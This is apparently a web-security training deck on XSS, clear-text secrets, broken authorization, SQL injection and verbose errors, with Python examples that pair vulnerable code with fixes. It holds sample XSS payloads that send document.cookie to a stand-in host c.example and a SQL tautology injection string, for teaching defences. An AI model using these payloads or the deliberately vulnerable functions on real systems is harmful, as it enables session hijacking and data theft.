
Top 5 Web App Security bugs

Cross-Site Scripting

(Slide diagram: normal execution vs. what the attacker does)

Types of Cross-Site Scripting


Non-persistent (reflected) attack:

1. A often visits a particular website, which is hosted by B. B's website allows A to log in with a username/password pair and stores sensitive data, such as billing information.
2. C observes that B's website contains a reflected XSS vulnerability.
3. C crafts a URL to exploit the vulnerability and sends A an email, enticing her to click on a link for the URL under false pretenses. This URL points to B's website but contains C's malicious code, which the website will reflect.
4. A visits the URL provided by C while logged into B's website.
5. The malicious script embedded in the URL executes in A's browser as if it came directly from B's server (this is the actual XSS vulnerability). The script can be used to send A's session cookie to C. C can then use the session cookie to steal sensitive information available to A (authentication credentials, billing info, etc.) without A's knowledge.

Persistent (stored) attack:

1. C posts a message with a malicious payload to a social network; the payload is stored on the server and served to everyone who views the message.
2. When B (the host) reads the message, C's XSS steals B's cookie.
3. C can now hijack B's session and impersonate B.

Prevention to Cross-Site Scripting

- Check that ASP.NET request validation is enabled. Request validation is a blocklist and therefore only defence in depth; it does not replace output encoding.
- Review ASP.NET code that generates HTML output and make sure every piece of untrusted data is encoded for the context it is written into (HTML body, attribute, JavaScript, URL).
- Review potentially dangerous HTML tags and attributes.
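The reflected scenario above, as an added example that is not part of the original slides. It is written in Python rather than ASP.NET because the mechanics (reflect verbatim, reflect encoded, and why a blocklist is not enough) are the same in any server-side language; the search parameter name, the collector URL and the blocklist rule are assumptions made here, not ASP.NET's actual request-validation rules.

```python
import html

# Constructed sample payloads: what C puts in the "q" parameter of the link sent
# to A. The collector host c.example and the parameter name are assumptions.
COOKIE_STEALER = '<script>new Image().src="http://c.example/?c="+document.cookie</script>'
EVENT_HANDLER_PAYLOAD = '<img src=x onerror="new Image().src=\'http://c.example/?c=\'+document.cookie">'
ATTRIBUTE_BREAKOUT = '" autofocus onfocus="alert(document.cookie)'


def render_unsafe(query: str) -> str:
    """B's page, reflecting the search parameter into the HTML body verbatim.

    This is the reflected XSS bug: whatever C put in the URL runs in A's
    browser under B's origin, so it can read document.cookie and send it away.
    """
    return f"<p>Results for: {query}</p>"


def render_safe(query: str) -> str:
    """Same page with the parameter encoded for the HTML body context.

    The browser now displays the payload as text instead of parsing it as markup.
    """
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_attr_safe(query: str) -> str:
    """Reflecting into a quoted attribute: quotes must be encoded as well
    (quote=True does this), or the attacker closes the attribute and appends an
    event handler such as onfocus."""
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def naive_request_validation(query: str) -> bool:
    """A crude blocklist standing in for request validation; returns True if the
    input is accepted. This is NOT ASP.NET's rule set, only the shape of one.

    A blocklist rejects the patterns its author thought of: this one stops the
    <script> payload but passes the event-handler payload, which is why request
    validation is defence in depth and output encoding is the actual fix.
    """
    return "<script" not in query.lower()


if __name__ == "__main__":
    print("unsafe :", render_unsafe(COOKIE_STEALER))
    print("safe   :", render_safe(COOKIE_STEALER))
    print("attr   :", render_attr_safe(ATTRIBUTE_BREAKOUT))
    print("blocklist accepts img payload:", naive_request_validation(EVENT_HANDLER_PAYLOAD))
```

Encode at the point of output, for the context you are writing into; do not rely on having cleaned the input once on the way in.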

Clear Text Secrets


Sensitive data such as user credentials and cryptographic keys must never be stored, cached, or sent unencrypted. For instance: logon passwords, PINs, credit card numbers, telephone calling card numbers, and session IDs that can be used to gain access to goods, services, or confidential information must always be stored and sent encrypted. For logon passwords, "stored encrypted" should mean a salted, slow one-way hash rather than reversible encryption, so that a leaked database does not yield the passwords even to someone who also holds the key.

Countermeasures to Clear Text Secrets

- Use trusted and proven standard algorithms for encryption; do not design your own.
- Do not store secrets (passwords, keys) in code.
- Use the aspnet_regiis tool to encrypt configuration settings (for example, the connection strings section of web.config).

Authorization Issues

(Slide diagram: Direct Object Reference, normal execution vs. what the attacker does)

Countermeasures to Authorization Issues


- Perform server-side authorization on every request: an object identifier taken from the URL or a form field must be checked against the authenticated user, never trusted because the client sent it.
- Use a platform-provided authorization mechanism rather than hand-rolled checks; in ASP.NET this means URL authorization and declarative checks.
- Implement authorization controls in middle tiers, such as gateways, so that every path to the data is checked and a missed check in one page does not expose the object.
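An added example of the direct object reference problem and the first two countermeasures (an ownership check on the server, and a declarative role check attached to the handler). It is illustrative Python, not code from the slides or from ASP.NET; the invoice data, user names and role name are constructed for the example.

```python
import functools
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised when the current user may not access the requested object."""


@dataclass(frozen=True)
class User:
    name: str
    roles: frozenset


@dataclass(frozen=True)
class Invoice:
    id: int
    owner: str
    amount: int


# Constructed sample data standing in for the database.
INVOICES = {
    1001: Invoice(1001, "alice", 120),
    1002: Invoice(1002, "bob", 75),
}


def get_invoice_unchecked(invoice_id: int) -> Invoice:
    """The bug: the id from the URL (/invoice?id=1002) is looked up directly, so
    alice only has to change the number to read bob's invoice."""
    return INVOICES[invoice_id]


def can_access(user: User, invoice_id: int) -> bool:
    """Server-side ownership check. Unknown ids and other users' ids both yield
    False, so the response does not reveal which ids exist."""
    invoice = INVOICES.get(invoice_id)
    return invoice is not None and invoice.owner == user.name


def get_invoice(user: User, invoice_id: int) -> Invoice:
    """The fix: authorize against the authenticated user before returning data."""
    if not can_access(user, invoice_id):
        raise Forbidden(f"{user.name} may not access invoice {invoice_id}")
    return INVOICES[invoice_id]


def has_role(user: User, role: str) -> bool:
    return role in user.roles


def requires_role(role: str):
    """Declarative check in the style of a platform attribute: the rule sits on
    the handler, so a reviewer can see it without reading the body."""
    def decorator(fn):
        @functools.wraps(fn)
        def wrapper(user: User, *args, **kwargs):
            if not has_role(user, role):
                raise Forbidden(f"{user.name} lacks role {role}")
            return fn(user, *args, **kwargs)
        return wrapper
    return decorator


@requires_role("billing_admin")
def list_all_invoices(user: User) -> list:
    """Admin-only listing; the decorator enforces the rule on every call."""
    return sorted(INVOICES.values(), key=lambda inv: inv.id)


ALICE = User("alice", frozenset())
ADMIN = User("carol", frozenset({"billing_admin"}))


if __name__ == "__main__":
    print("unchecked, alice reads bob's invoice:", get_invoice_unchecked(1002))
    print("checked, alice reads her own        :", get_invoice(ALICE, 1001))
    try:
        get_invoice(ALICE, 1002)
    except Forbidden as exc:
        print("checked, alice reads bob's invoice :", exc)
    print("admin listing:", [inv.id for inv in list_all_invoices(ADMIN)])
```

The check is keyed on the identity the server established at login, not on anything in the request; that is what "server-side authorization" means in practice.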

SQL Injection

User input without sufficient validation is used to create and execute a dynamic SQL statement. User can manipulate the SQL statement that gets executed.

(Slide diagram: SQL Injection, normal execution vs. what the attacker does)

Countermeasures to SQL Injection


- Constrain and sanitize input data: check for known good data by validating type, length, format, and range.
- Use safe SQL parameters for data access: if you use a parameters collection, input is treated as a literal value, and SQL Server does not treat it as executable code.
- Use an account that has restricted permissions in the database: ideally, grant execute permissions only to selected stored procedures and provide no direct table access.
- Avoid disclosing database error information: in the event of database errors, make sure you do not disclose detailed error messages to the user.

Verbose Error Messages

(Slide diagram: what verbose error messages lead to)

Countermeasures to Verbose Errors

When an exception occurs, display a generic error page to the user instead of the verbose message (stack trace, file paths, database details) that an unhandled crash would show, and log the details server-side for developers. In ASP.NET the customErrors setting in web.config controls this.
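One added example serving both the SQL injection countermeasures above (validate for known-good, bind parameters, hide database errors) and the verbose-error countermeasure just stated. It is not code from the slides and uses Python with an in-memory SQLite database in place of ASP.NET and SQL Server; the table, the sample users and the username pattern are constructed for the example. The restricted database account cannot be shown with SQLite, which has no accounts, and stays a server-side configuration step.

```python
import logging
import re
import sqlite3

log = logging.getLogger("db")

# Known-good pattern for usernames; the policy is an assumption for this example.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")

GENERIC_ERROR = "An internal error occurred. Please try again later."


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the application's SQL Server."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b")],
    )
    return conn


def find_user_unsafe(conn, username: str) -> list:
    """Dynamic SQL built from user input: the injection bug. The input
    x' OR '1'='1 turns the WHERE clause into a tautology and returns every row."""
    sql = f"SELECT id, username FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username: str) -> list:
    """Parameterised query: the value is bound as data and never parsed as SQL,
    so the same input simply matches no user."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()


def validate_username(value: str) -> str:
    """Reject anything outside the known-good set before it reaches the database."""
    if not USERNAME_RE.fullmatch(value):
        raise ValueError("username does not match the allowed pattern")
    return value


def run_query(conn, sql: str, params=()) -> tuple:
    """Return (rows, None) on success or (None, generic message) on failure.
    The detailed error text (table names, SQL fragments) goes to the server log only."""
    try:
        return conn.execute(sql, params).fetchall(), None
    except sqlite3.Error as exc:
        log.error("database error running %r: %s", sql, exc)
        return None, GENERIC_ERROR


def lookup_user(conn, raw_username: str) -> dict:
    """Request handler: validate, then parameterise, then fail closed with a
    message that tells the user nothing about the database."""
    try:
        username = validate_username(raw_username)
    except ValueError:
        return {"ok": False, "error": "Invalid username."}
    rows, error = run_query(
        conn, "SELECT id, username FROM users WHERE username = ?", (username,)
    )
    if error:
        return {"ok": False, "error": error}
    return {"ok": True, "users": rows}


if __name__ == "__main__":
    db = make_db()
    injection = "x' OR '1'='1"
    print("unsafe :", find_user_unsafe(db, injection))
    print("safe   :", find_user_safe(db, injection))
    print("handler:", lookup_user(db, injection))
    print("error  :", run_query(db, "SELECT * FROM no_such_table"))
```

Validation and parameters are independent layers: validation narrows what reaches the query, parameters guarantee that whatever does reach it is data. Keep both, and never let the raw exception text reach the response.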

Other Bugs

- Range check: the accepted range of similar fields should be uniform, e.g. the phone/mobile number field should enforce the same length and format everywhere it appears.
- Back button: sometimes the browser's Back button causes user data to be revealed or re-submitted and altered, which is very serious in the case of transactions or user information.
- Bug repetition: once a bug type has been resolved, the same bug should not reappear. For example, the hotel rule was not being updated properly at an earlier time, and after a patch the issue was noticed again.
- Session expiry: the session expiry time is also non-uniform across the application.
- Uniformity of error messages: error messages should be uniform in terms of display location and type.
- Scrollbar: if the input value for a particular field is large, a scrollbar should be present so that the page layout is not affected.

Feedback / QnA
